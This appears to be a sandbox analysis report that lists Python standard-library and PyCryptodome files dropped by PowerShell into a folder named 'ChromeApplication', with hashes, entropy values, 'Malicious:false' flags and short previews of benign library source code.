                                                                                                                                                                                                  Preview:#..# Secret Labs' Regular Expression Engine..#..# re-compatible interface for the sre matching engine..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# This version of the SRE library can be redistributed under CNRI's..# Python 1.6 license. For any other use, please contact Secret Labs..# AB (info@pythonware.com)...#..# Portions of this engine have been developed in cooperation with..# CNRI. Hewlett-Packard provided funding for 1.6 integration and..# other compatibility work...#....r"""Support for regular expressions (RE).....This module provides regular expression matching operations similar to..those found in Perl. It supports both 8-bit and Unicode strings; both..the pattern and the strings being processed can contain null bytes and..characters outside the US ASCII range.....Regular expressions can contain both special and ordinary characters...Most ordinary characters, like "A", "a", or "0", are the simplest..regular expressions; they simply match them

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\reprlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5428
                                                                                                                                                                                                  Entropy (8bit):4.417412104082839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:Sr5xgG+4UXDromvJYKvi8hkEfoerKBLi22z80OsgmtoJLe4N90Mvs7hui:I+BromPUjyJ+LeQ2Yri
                                                                                                                                                                                                  MD5:E7C51384148475BFFEB9729DF4B33B69
                                                                                                                                                                                                  SHA1:58109E3AE253B6F9BF94BD8A2C880BEAE0EDDF94
                                                                                                                                                                                                  SHA-256:3BE6CDE6103319B3CA44BBC4D40C60E0BCB14A53E93E2578E8E4E850F4A8C66B
                                                                                                                                                                                                  SHA-512:A7C81FD784E537DA08A8EAD5A6C635B66123DE815B73FAE2B9F1662CF49AF4C9E41E648075CC0EE2A64C034FA38DA4A4E90163E9B955B17D20490EEB86004341
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Redo the builtin repr() (representation) but with limits on most sizes."""....__all__ = ["Repr", "repr", "recursive_repr"]....import builtins..from itertools import islice..from _thread import get_ident....def recursive_repr(fillvalue='...'):.. 'Decorator to make a repr function return fillvalue for a recursive call'.... def decorating_function(user_function):.. repr_running = set().... def wrapper(self):.. key = id(self), get_ident().. if key in repr_running:.. return fillvalue.. repr_running.add(key).. try:.. result = user_function(self).. finally:.. repr_running.discard(key).. return result.... # Can't use functools.wraps() here because of bootstrap issues.. wrapper.__module__ = getattr(user_function, '__module__').. wrapper.__doc__ = getattr(user_function, '__doc__').. wrapper.__name__ = getattr(user_function, '__name__').

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\rlcompleter.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8036
                                                                                                                                                                                                  Entropy (8bit):4.287904072572339
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:2rW3kbV7us2JNNHU9lfnhRU4Fnv4blKREfGCcshW5YvNEEv+B:KGk1uHU9xhR5nvxCED1EWB
                                                                                                                                                                                                  MD5:FE0FF94FFFE2562374E8A375642273DF
                                                                                                                                                                                                  SHA1:21A40B86C9C389A3A8CF23CCC9CEB34E31DF5365
                                                                                                                                                                                                  SHA-256:F06D3AFBA28DE908AC91EA1361C66D5F567D4755EEECAF91740019B7E64B25DC
                                                                                                                                                                                                  SHA-512:98070C06DC839CC169F9E5CE4850C9B001F52645531BDC309C411D9B98BE200003FE3E6D99872F782A92DCF97C21A7AFD7CCC351F329D24C9FF1739856755CB8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Word completion for GNU readline.....The completer completes keywords, built-ins and globals in a selectable..namespace (which defaults to __main__); when completing NAME.NAME..., it..evaluates (!) the expression up to the last dot and completes its attributes.....It's very cool to do "import sys" type "sys.", hit the completion key (twice),..and see the list of names defined by the sys module!....Tip: to use the tab key as the completion key, call.... readline.parse_and_bind("tab: complete")....Notes:....- Exceptions raised by the completer function are *ignored* (and generally cause.. the completion to fail). This is a feature -- since readline sets the tty.. device in raw (or cbreak) mode, printing a traceback wouldn't work well.. without some complicated hoopla to save, reset and restore the tty state.....- The evaluation of the NAME.NAME... form may cause arbitrary application.. defined code to be executed if an object with a __getattr__ hook is found... Since it is th

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\runpy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13432
                                                                                                                                                                                                  Entropy (8bit):4.4682911817309865
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:E5HgdO+nKGY9d9GxlJ4fr+2O4lAfhdgkdn+eO9:E5p5z3r+FRhdJO9
                                                                                                                                                                                                  MD5:EAD7DE516F81BDF655C6E96A2BC0D3C9
                                                                                                                                                                                                  SHA1:FE69379AC14C0F742E02482839B20FDA1BFE4325
                                                                                                                                                                                                  SHA-256:001DEC8ADF8925F2C61C25F4F4D49CDAD60E2AF45D1B34692C60AB022889120B
                                                                                                                                                                                                  SHA-512:3A47A82096E5849EEEF06B5B79EFC687DB6D0E93716E3C3B0C13135BD70464943213475E353C3C3F1A89EFB068EC4EF1C394A4EB4D550425FD5146ED49CD6BD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""runpy.py - locating and running Python code using the module namespace....Provides support for locating and running Python scripts using the Python..module namespace instead of the native filesystem.....This allows Python code to play nicely with non-filesystem based PEP 302..importers when locating support scripts as well as when importing modules..."""..# Written by Nick Coghlan <ncoghlan at gmail.com>..# to implement PEP 338 (Executing Modules as Scripts)......import sys..import importlib.machinery # importlib first so we can test #15386 via -m..import importlib.util..import io..import types..import os....__all__ = [.. "run_module", "run_path",..]....class _TempModule(object):.. """Temporarily replace a module in sys.modules with an empty namespace""".. def __init__(self, mod_name):.. self.mod_name = mod_name.. self.module = types.ModuleType(mod_name).. self._saved_module = [].... def __enter__(self):.. mod_name = self.mod_name..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\sched.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6518
                                                                                                                                                                                                  Entropy (8bit):4.428021460534201
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:7q7NKEDtr4SBrumjWpdBpBO6tibxmPKq5d6JIad/vkk:7q7N7jU26ut2Q/vkk
                                                                                                                                                                                                  MD5:BBC46866A07502770BEC1716C4F1CEF0
                                                                                                                                                                                                  SHA1:6E1FD86C4786295109C5F67194C980238A780C56
                                                                                                                                                                                                  SHA-256:D337D7DDBEB4852D806AE3D29DD73C0F2E0A332C8CE4BEADDF7173C34D6849D8
                                                                                                                                                                                                  SHA-512:FF21A29BDB6E29D0A2FEB1FC711B33055001D529F28034C2F37D5159BB709D93FE51305F43D60B36CDE7D181C8876EB7FD2BBC1D43E49F2FE3CD27BD9DB832F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A generally useful event scheduler class.....Each instance of this class manages its own queue...No multi-threading is implied; you are supposed to hack that..yourself, or use a single instance per application.....Each instance is parametrized with two functions, one that is..supposed to return the current time, one that is supposed to..implement a delay. You can implement real-time scheduling by..substituting time and sleep from built-in module time, or you can..implement simulated time by writing your own functions. This can..also be used to integrate scheduling with STDWIN events; the delay..function is allowed to modify the queue. Time can be expressed as..integers or floating point numbers, as long as it is consistent.....Events are specified by tuples (time, priority, action, argument, kwargs)...As in UNIX, lower priority numbers mean higher priority; in this..way the queue can be maintained as a priority queue. Execution of the..event means calling the action function, pa

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\secrets.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2108
                                                                                                                                                                                                  Entropy (8bit):5.0681098576980395
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OHe6kvHbJSNg/Yya6+N+Rv+f3xg8boRkGm26/UZ68fpqstap:mJk1Sq/YN6pRvGxgnRkGm26/UZ6+qAK
                                                                                                                                                                                                  MD5:C603DB6D1DC7CA53EF4EDF99ADE55CD6
                                                                                                                                                                                                  SHA1:36FD0055E017C494EB0E37FD15BA520896C3E4CA
                                                                                                                                                                                                  SHA-256:8B91B370319945770CCC838EBDF438313212129EB1F7E1938DD0882688EC7A18
                                                                                                                                                                                                  SHA-512:99F3C414DC3C997D5E246F427628419538115DF21EB7F48A690895AEA179C6F4596BDA0BB75FC9756281EEFE6C926393C6745C65EC6F916FA554B37FAC3804C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Generate cryptographically strong pseudo-random numbers suitable for..managing secrets such as account authentication, tokens, and similar.....See PEP 506 for more information...https://www.python.org/dev/peps/pep-0506/...."""....__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom',.. 'token_bytes', 'token_hex', 'token_urlsafe',.. 'compare_digest',.. ]......import base64..import binascii....from hmac import compare_digest..from random import SystemRandom...._sysrand = SystemRandom()....randbits = _sysrand.getrandbits..choice = _sysrand.choice....def randbelow(exclusive_upper_bound):.. """Return a random int in the range [0, n).""".. if exclusive_upper_bound <= 0:.. raise ValueError("Upper bound must be positive.").. return _sysrand._randbelow(exclusive_upper_bound)....DEFAULT_ENTROPY = 32 # number of bytes to return by default....def token_bytes(nbytes=None):.. """Return a random byte string containing *nbytes* bytes.....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\selectors.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20155
                                                                                                                                                                                                  Entropy (8bit):4.441366171897365
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:dTlKqIJUzY8EJm8QQo7YA3bVMR0Qid+dWMcK3CM1pBY45wBrhc6YN4o4F1Yzp8cW:dxK8DEDEBBhQErzhF8eTpJ
                                                                                                                                                                                                  MD5:01BBBA21BD0235FB164A2ED722AD6D04
                                                                                                                                                                                                  SHA1:CBCF9E771D22817D8AED482166D70D16E8711D36
                                                                                                                                                                                                  SHA-256:28DA125E058CD0E535467B214B510EE4B1E666BE57EDB183404C09EDF935EBBC
                                                                                                                                                                                                  SHA-512:1626C618D742458D1C66626758A0BC28F1C829C60EC8F14B02BFD7E82803FF771103C0D5C22C063229920478F5BAAF694B8DBA32115DD5C41AF290153F634F2D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Selectors module.....This module allows high-level and efficient I/O multiplexing, built upon the..`select` module primitives..."""......from abc import ABCMeta, abstractmethod..from collections import namedtuple..from collections.abc import Mapping..import math..import select..import sys......# generic events, that must be mapped to implementation-specific ones..EVENT_READ = (1 << 0)..EVENT_WRITE = (1 << 1)......def _fileobj_to_fd(fileobj):.. """Return a file descriptor from a file object..... Parameters:.. fileobj -- file object or file descriptor.... Returns:.. corresponding file descriptor.... Raises:.. ValueError if the object is invalid.. """.. if isinstance(fileobj, int):.. fd = fileobj.. else:.. try:.. fd = int(fileobj.fileno()).. except (AttributeError, TypeError, ValueError):.. raise ValueError("Invalid file object: ".. "{!r}".format(fileobj)) from None.. if fd < 0:..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\shelve.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8803
                                                                                                                                                                                                  Entropy (8bit):4.563820102763972
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:0x+ykEgEzeDlpO/ki7QqpiG9GikHQ/aBKC8rFo:07kEgEzeDlpO/kiJpa9BYO
                                                                                                                                                                                                  MD5:D72FAB00C3F5E7AED0B707D03A30CB02
                                                                                                                                                                                                  SHA1:54751E0C54FB64364A9989D9D7B519C3D1E293EF
                                                                                                                                                                                                  SHA-256:0C8AC8DCB31AB0E9B5EBFD1CC99A827BC78DEFF9966BCC7F7B6A3AB08388A9AE
                                                                                                                                                                                                  SHA-512:D127A2E2F6740A2845EBF455D3501B85D60F4E452D2D48029D47584149646C2A2ED189D6B9A4D6AD544EE9102ED9D3FF2579DFE348FFC641CA7CE2D292A381C2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Manage shelves of pickled objects.....A "shelf" is a persistent, dictionary-like object. The difference..with dbm databases is that the values (not the keys!) in a shelf can..be essentially arbitrary Python objects -- anything that the "pickle"..module can handle. This includes most class instances, recursive data..types, and objects containing lots of shared sub-objects. The keys..are ordinary strings.....To summarize the interface (key is a string, data is an arbitrary..object):.... import shelve.. d = shelve.open(filename) # open, with (g)dbm filename -- no suffix.... d[key] = data # store data at key (overwrites old data if.. # using an existing key).. data = d[key] # retrieve a COPY of the data at key (raise.. # KeyError if no such key) -- NOTE that this.. # access returns a *copy* of the entry!.. del d[key] # delete data stored at key (raises KeyError..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\shlex.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13851
                                                                                                                                                                                                  Entropy (8bit):4.098342133535539
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:TiBJXH8qfr4rCOaCDCCaZUCELCrC46CBJ/WKCvCCxrJMBCSYCieC1eCEyCS412/u:TiBJXH8qf/qd67WaaZaUT66T6T1gzji
                                                                                                                                                                                                  MD5:618BD4282F39939BF6F935F67D4107C7
                                                                                                                                                                                                  SHA1:42E6CD923D7EE305A0D70F6BA861DE587EC2F444
                                                                                                                                                                                                  SHA-256:731C1374ED3D47C53C0C38E4898F2A21DF0B7984E730C7FF3F3B26B96B25FAC6
                                                                                                                                                                                                  SHA-512:7710378DA30D5CEE798FE09FA60B2B8A7C1F4E0B288E0F37319C7AC574451CBE6B983E82A2A813CD64BBD8C04807686080AC8C7FD105E584E35AF51FFED1B5B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A lexical analyzer class for simple shell-like syntaxes."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998..# Input stacking and error message cleanup added by ESR, March 2000..# push_source() and pop_source() made explicit by ESR, January 2001...# Posix compliance, split(), string arguments, and..# iterator interface by Gustavo Niemeyer, April 2003...# changes to tokenize more like Posix shells by Vinay Sajip, July 2016.....import os..import re..import sys..from collections import deque....from io import StringIO....__all__ = ["shlex", "split", "quote", "join"]....class shlex:.. "A lexical analyzer class for simple shell-like syntaxes.".. def __init__(self, instream=None, infile=None, posix=False,.. punctuation_chars=False):.. if isinstance(instream, str):.. instream = StringIO(instream).. if instream is not None:.. self.instream = instream.. self.infile = infile.. else:.. self.ins

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\shutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55816
                                                                                                                                                                                                  Entropy (8bit):4.55270615672447
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:pQmQwxUSSvo4zYHze7D2tYy0QZGqr8TyvBZ9hmmDcrEi:pQmpnSvo4ETe7YuuDcrEi
                                                                                                                                                                                                  MD5:964EE17F609BDE1FDDC4EBE87DB9DC63
                                                                                                                                                                                                  SHA1:7073C339362B7DD618C02A6DBAD5B465A5CF3DC1
                                                                                                                                                                                                  SHA-256:09B0142B9E9BF996170D05834FCA7B466AC7B64F7F6DFCEB17CB581CD0E53F08
                                                                                                                                                                                                  SHA-512:0642B3DA6A7DC8E14EA0FD73AF72E23AB141A4554BB7267D69A456A19F45F7E0FFB70A6537C6720FFA970E2F07DD372D60BC595ECFCDB4C80A038C0EF2C55698
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Utility functions for copying and archiving files and directory trees.....XXX The functions here don't copy the resource fork or other metadata on Mac....."""....import os..import sys..import stat..import fnmatch..import collections..import errno....try:.. import zlib.. del zlib.. _ZLIB_SUPPORTED = True..except ImportError:.. _ZLIB_SUPPORTED = False....try:.. import bz2.. del bz2.. _BZ2_SUPPORTED = True..except ImportError:.. _BZ2_SUPPORTED = False....try:.. import lzma.. del lzma.. _LZMA_SUPPORTED = True..except ImportError:.. _LZMA_SUPPORTED = False...._WINDOWS = os.name == 'nt'..posix = nt = None..if os.name == 'posix':.. import posix..elif _WINDOWS:.. import nt....COPY_BUFSIZE = 1024 * 1024 if _WINDOWS else 64 * 1024.._USE_CP_SENDFILE = hasattr(os, "sendfile") and sys.platform.startswith("linux").._HAS_FCOPYFILE = posix and hasattr(posix, "_fcopyfile") # macOS....# CMD defaults in Windows 10.._WIN_DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\signal.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2530
                                                                                                                                                                                                  Entropy (8bit):4.711624840854989
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:SipTfd9QLvDh4vDgitan3vchcLysiasNuk0A942ZQR2qXZORotZuGqzCs:SiRfd9QLvt4vsit+0uustsJQRARoOj
                                                                                                                                                                                                  MD5:0DCA73844D3B73C9802F6210C70DD4DE
                                                                                                                                                                                                  SHA1:EABEABA84B410A8E97CA2D42B2AE48CA2B78D8EC
                                                                                                                                                                                                  SHA-256:D470D65C87914AE671A202B8987437A6918AAE477942E58BDB1D0056528115F7
                                                                                                                                                                                                  SHA-512:440149ABE836FFD5E4716F2474A6D0C6A0460F543A39BEC68E15651B5BC3E3294F7FC0D85C41C449224F234219809F710743E0002501D734A721B68377D39036
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import _signal..from _signal import *..from enum import IntEnum as _IntEnum...._globals = globals()...._IntEnum._convert_(.. 'Signals', __name__,.. lambda name:.. name.isupper().. and (name.startswith('SIG') and not name.startswith('SIG_')).. or name.startswith('CTRL_'))...._IntEnum._convert_(.. 'Handlers', __name__,.. lambda name: name in ('SIG_DFL', 'SIG_IGN'))....if 'pthread_sigmask' in _globals:.. _IntEnum._convert_(.. 'Sigmasks', __name__,.. lambda name: name in ('SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'))......def _int_to_enum(value, enum_klass):.. """Convert a numeric value to an IntEnum member... If it's not a known member, return the numeric value itself... """.. try:.. return enum_klass(value).. except ValueError:.. return value......def _enum_to_int(value):.. """Convert an IntEnum member to a numeric value... If it's not an IntEnum member return the value

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\AES.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9152
                                                                                                                                                                                                  Entropy (8bit):4.914458127073994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:dmQHvdBT4geSDztF9+hMkRI4H1Fit/zyc/Ki/yRAL:sedBTRt4Ot/L/K7AL
                                                                                                                                                                                                  MD5:8262A551167B54C56C60F05240A69080
                                                                                                                                                                                                  SHA1:05FF4ED6FAE8771AEE11D3E18D0AEB9B360764E7
                                                                                                                                                                                                  SHA-256:C9C16133388BA9C97A5A9541B671A767EC316FF32C74B7FA261BE4C2686B4119
                                                                                                                                                                                                  SHA-512:E82A1D9BFDA7EF6AFE84FE6DC126091B65ABA252C95B338599149064B3AE1F272DBA4F68A2DB593A61469396FC5D802A21B4C82EA48651720F47CEAF90453843
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/AES.py : AES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\AES.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3775
                                                                                                                                                                                                  Entropy (8bit):4.806063133542859
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:5FYPjdtB5JjZL6mKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:5PZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                                                                                  MD5:B945169B742389524DF72625C079BB77
                                                                                                                                                                                                  SHA1:C9E77F8537E3B9888CBCF45E26774192ACB0C39A
                                                                                                                                                                                                  SHA-256:A0C8ED071D9E4B833FFD9BCA4658711806A4DA9D95492333EF39B61EF84FD1F6
                                                                                                                                                                                                  SHA-512:E1FAA4C936410781682007CE1C65C03D2CE947DCFB1A50D75184B075F5BEBC070A87FED4511086BBBF073EA831331BA8DFD3B87B520D5137AB80FB91D3AD4DA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_ccm import CcmMode..from Crypto.Cipher._mode_eax import EaxMode..from Crypto.Cipher._mode_gcm import GcmMode..from Crypto.Cipher._mode_siv import SivMode..from Crypto.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Literal[1],.. use_aesni : bool = ...) ->

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ARC2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7185
                                                                                                                                                                                                  Entropy (8bit):4.784592068528299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:dHQHv8gflA2jSkmRFmynD/t4AKdRYotKI:te8g9A82jnD/t4hjYotKI
                                                                                                                                                                                                  MD5:274E46A9AE6D3E092B48A7D1AB3F0D6D
                                                                                                                                                                                                  SHA1:FB5A62548FB3876FF73319D3C92565B64CEA3E69
                                                                                                                                                                                                  SHA-256:CF808C3951F83D9E86799E02A564661D6C372216656DC5D40FD9E19B21D84A53
                                                                                                                                                                                                  SHA-512:D9850D167368AE4B901512D5B3111EF6858E643FCD4DCA7EE2A263ADBB621D3D9729D124A9A9570EB250D63034734663B16770ACC5B2D4F1CEEFB3E47EACD8B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC2.py : ARC2.py..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ARC2.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1020
                                                                                                                                                                                                  Entropy (8bit):4.950943296452636
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+PvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+Hx9GIJqJejbFoeRZ
                                                                                                                                                                                                  MD5:E00CF491B8FC5ACAF9CEF612321636A0
                                                                                                                                                                                                  SHA1:AB112C6E5D09F9A330047422454765FC4D691F1F
                                                                                                                                                                                                  SHA-256:605DD941F8ED380F3CF8906B995FCF9CFD8D801668E85B8FC889D72EC00087CD
                                                                                                                                                                                                  SHA-512:5FE5E3E20E1911E73FAB3886072A47F6C0E554C9F0D1A3604FDB8577747143C220457FB1105D565589E59A6202EE893F2F5C82A63267AEFA061BB129BA3A23C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\ARC4.py

